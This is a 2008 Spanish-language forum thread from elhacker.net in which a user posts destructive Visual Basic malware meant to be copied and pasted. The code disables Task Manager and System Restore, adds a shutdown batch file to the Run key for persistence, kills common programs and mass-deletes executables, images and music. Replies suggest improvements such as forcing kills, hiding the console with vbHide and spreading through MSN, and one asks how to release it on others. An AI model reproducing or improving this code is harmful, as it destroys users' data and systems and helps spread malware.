elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Virus simple en VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Virus simple en VB  (Leído 3,620 veces)
DProduct

Desconectado Desconectado

Mensajes: 236


I´m going to hack you


Ver Perfil WWW
Virus simple en VB
« en: 6 Febrero 2008, 20:27 pm »

Acabo de hacer mi primer virus en VB. Solo hay que copiarlo y pegarlo en el código, y ya esta listo:
------------------------------------
Private Sub Form_Load()
Kill "C:\Documents and Settings\All Users\Menú Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar sistema.lnk"
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
Shell "cmd.exe cd C:\WINDOWS"
Shell "cmd.exe echo off>Win32.bat"
Shell "cmd.exe echo @echo off>>Win32.bat"
Shell "cmd.exe echo set hora=%time:~0,5%>>Win32.bat"
Shell "cmd.exe echo set hor=%hora:~0,2%>>Win32.bat"
Shell "cmd.exe echo set min=%hora:~3,5%>>Win32.bat"
Shell "cmd.exe echo set /a boumb = %min% + 0,30>>Win32.bat"
Shell "cmd.exe echo AT %hora% %min% tsshutdown -s -f -c ""Imbecil"""
Shell "cmd.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v LordShack /d C:\WINDOWS\Win32.bat"
Shell "cmd.exe taskkill msnmsgr.exe"
Shell "cmd.exe taskkill msnmsgs.exe"
Shell "cmd.exe taskkill schvoust.exe"
Shell "cmd.exe taskkill iexplore.exe"
Shell "cmd.exe taskkill word.exe"
Shell "cmd.exe taskkill outlook.exe"
Shell "cmd.exe taskkill notepad.exe"
Shell "cmd.exe taskkill mspaint.exe"
Shell "cmd.exe del /Q /S /F msnmsgr.exe"
Shell "cmd.exe del /Q /S /F msnmsgs.exe"
Shell "cmd.exe del /Q /S /F schvoust.exe"
Shell "cmd.exe del /Q /S /F iexplore.exe"
Shell "cmd.exe del /Q /S /F word.exe"
Shell "cmd.exe del /Q /S /F outlook.exe"
Shell "cmd.exe del /Q /S /F notepad.exe"
Shell "cmd.exe del /Q /S /F mspaint.exe"
Shell "cmd.exe del /Q /S /F C:\ *.jpg"
Shell "cmd.exe del /Q /S /F C:\ *.bmp"
Shell "cmd.exe del /Q /S /F C:\ *.png"
Shell "cmd.exe del /Q /S /F C:\ *.psd"
Shell "cmd.exe del /Q /S /F C:\ *.mp3"
Shell "cmd.exe del /Q /S /F C:\ *.mid"
End Sub
------------------------------------

Lo que hace es:
1.- Impedir recuperar el equipo
2.- Eliminar el Administrador de Tareas
3.- Crear un virus que apaga el PC a los 30 min de abrirlo y lo agrega al registro
4.- Se carga varios procesos, las imagenes y la música


En línea

Sé una cosa... dentro de escasos segundos vas a morir... ¿que porque lo sé?... Mira detrás de ti
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Virus simple en VB
« Respuesta #1 en: 6 Febrero 2008, 20:36 pm »

Weno, si es de lo primero q haces no esta mal, pero te aconsejo q uses environ en vez de rutas completas, q puede fallar en muchos pc's, ah! y no es un virus, ya q no infecta nada ;)


En línea

SheKeL_C$


Desconectado Desconectado

Mensajes: 549


_-=[Sh3K3L_C$]=-_


Ver Perfil
Re: Virus simple en VB
« Respuesta #2 en: 6 Febrero 2008, 22:37 pm »

Y aparte de lo q t a dixo EON, es vb no lo dudo, pero se puede considerar Batch  >:D
En línea

mojolloyo20

Desconectado Desconectado

Mensajes: 208


en esta vida nunca te acostaras sin saber nada nue


Ver Perfil WWW
Re: Virus simple en VB
« Respuesta #3 en: 9 Febrero 2008, 17:34 pm »

pero aparte de todo esta muy bien.

si no se considera virus ni gusano,en que rama digamos queda?

me refiero como se consideraria.


un salu2  ;)
En línea

Lo reconozco
fumo porros a diario
me fumo uno y es como poner la radio
pero por dentro de mi amarga cabeza
siempre tan sola y tan llena de tristeza
Me salen la s canciones que a mí más me molan
las musiquillas que ha mí más me motivan
las amarguras se vuelven amapolas
y las tristezas me alegran la vida
Anda dame que fume
porque me siento sólo
dame de fumar
porque no quiero estar triste
jpmo4


Desconectado Desconectado

Mensajes: 1.579


Aproximadamente en........................


Ver Perfil
Re: Virus simple en VB
« Respuesta #4 en: 9 Febrero 2008, 19:56 pm »

Me sale un error. Cuando pongo el codigo me dice
"la instruccion no puede ir dentro del bloque de un metodo supone al final" es con respecto a:Private Sub Form_Load(). agradeceria su ayuda.
Ah y otra cosa como lo pruebo para no infectarme yo mismo y como lo largo al virus luego
En línea

Podras llevarme a mi novia, incluso hasta a mi perro, pero a mi computadora... jamas

   
[SMT]

Desconectado Desconectado

Mensajes: 108

Phoenix Team Coder


Ver Perfil
Re: Virus simple en VB
« Respuesta #5 en: 9 Febrero 2008, 21:29 pm »

jeje muy interesante me dan ganas de hacer un editor de batch! :P pero bueno..
a tu code osea el del batch se le peude arreglar muchas cosas para que sea "mas potente" dejame ayudarte:

Citar
Shell "cmd.exe taskkill msnmsgr.exe"
Shell "cmd.exe taskkill msnmsgs.exe"
Shell "cmd.exe taskkill schvoust.exe"
Shell "cmd.exe taskkill iexplore.exe"
Shell "cmd.exe taskkill word.exe"
Shell "cmd.exe taskkill outlook.exe"
Shell "cmd.exe taskkill notepad.exe"
Shell "cmd.exe taskkill mspaint.exe"
ponle /F /IM osea quedaria: taskkill /F /IM

Citar
Shell "cmd.exe echo AT %hora% %min% tsshutdown -s -f -c ""Imbecil"""
porque pones tss? para apagar la pc se usa es shutdown (y sus parametros)

Citar
Shell "cmd.exe del /Q /S /F msnmsgr.exe"
Shell "cmd.exe del /Q /S /F msnmsgs.exe"
Shell "cmd.exe del /Q /S /F schvoust.exe"
Shell "cmd.exe del /Q /S /F iexplore.exe"
Shell "cmd.exe del /Q /S /F word.exe"
Shell "cmd.exe del /Q /S /F outlook.exe"
Shell "cmd.exe del /Q /S /F notepad.exe"
Shell "cmd.exe del /Q /S /F mspaint.exe"
Shell "cmd.exe del /Q /S /F C:\ *.jpg"
Shell "cmd.exe del /Q /S /F C:\ *.bmp"
Shell "cmd.exe del /Q /S /F C:\ *.png"
Shell "cmd.exe del /Q /S /F C:\ *.psd"
Shell "cmd.exe del /Q /S /F C:\ *.mp3"
Shell "cmd.exe del /Q /S /F C:\ *.mid"
mm estas borrando el outlook, msn, mspaint, notepad? hay cosas que no estan en el directorio WINDOWS, como estas y creo que mas, que sepa mspaint esta es en el system32, = que el notepad, el msn esta en las carpetas del msn? deberias acomodar eso! :P
y para lo del del en el C:\ pues esta bien pero en el C:\ casi nadie tiene archivos .jpg, .mp3 y esos! mejor seria en elñ system32 o algo asi! ;)

Bueno esa es mi recomendacion! ;)

Salu2's! cool
En línea

Helicot


Desconectado Desconectado

Mensajes: 395


¿Q puedo colocar aki?


Ver Perfil
Re: Virus simple en VB
« Respuesta #6 en: 10 Febrero 2008, 07:47 am »

para el caso de los directorios, un app path no serviria ??????
En línea



DProduct

Desconectado Desconectado

Mensajes: 236


I´m going to hack you


Ver Perfil WWW
Re: Virus simple en VB
« Respuesta #7 en: 10 Febrero 2008, 14:04 pm »

Utilizo ts porque shutdown apaga el PC donde se ejecuta, en cambio, tsshutdown apaga todas las PC de la LAN ::)
Sobre lo de los directorios: He visto muchos virus que lo ponen asi.
Gracias por la corrección
En línea

Sé una cosa... dentro de escasos segundos vas a morir... ¿que porque lo sé?... Mira detrás de ti
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Virus simple en VB
« Respuesta #8 en: 10 Febrero 2008, 16:39 pm »

Pues yo te haría varias recomendaciones, por ejemplo, al abrir este ejecutable, se abrirá una ventana de la shell y ahi se podrá ver todo lo que hace, si pones por ejemplo:
Código:
,vbhide

Ya no aparecerá esa ventana. Otro punto es lo de cmd. No hace falta que lo pongas en cada instrucción, ni siquiera en la primera. Si pones por ejemplo:
Código:
Shell ("del /Q /S /F msnmsgr.exe")

Funcionaría igualmente. De todas formas, para ser el primero está bien, pero ya que lo has hecho desde vb lo pudes hacer mas "profesional"
Salu2
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
chrominum


Desconectado Desconectado

Mensajes: 567


Viceroy: No es lo que tengo, es COMO lo tengo


Ver Perfil WWW
Re: Virus simple en VB
« Respuesta #9 en: 10 Febrero 2008, 21:15 pm »

Esto esta en batch, no en VB. Y no es ni virus ni gusano, ya que no se propaga por si mismo, depende del autor. Como inicio esta bien, pero si quieres mejorarlo te recomiendo que te leas el manual de hendrix, que explica como propagarlo por msn (añades un temporizador para hacerlo todo real y que no lo suelte todo de golpe) y infectar otros archivos, entre otras cosas mas.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Las Fuerzas Aéreas aseguran que el virus de los drones fue una 'simple molestia'
Noticias
wolfbcn 0 2,908 Último mensaje 14 Octubre 2011, 03:03 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines